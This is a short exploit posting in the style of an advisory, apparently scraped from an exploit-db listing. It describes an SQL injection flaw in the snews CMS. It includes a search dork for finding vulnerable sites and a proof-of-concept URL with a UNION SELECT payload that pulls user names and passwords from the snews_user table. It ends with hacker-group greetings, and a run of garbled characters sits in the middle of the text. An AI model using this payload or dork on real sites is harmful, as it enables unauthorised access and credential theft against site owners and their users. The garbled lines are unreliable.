Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL poc:
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
) c! O) I6 l! O9 B! X* ^ % i& Z1 J6 m5 q6 V7 K
8 u* d' [3 F: ?' c致谢:5 `$ d6 y2 G- P4 G6 V6 Y6 k' b
4 ^3 q9 ?& [2 C- ^$ ~; V! M
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

special my hunny :*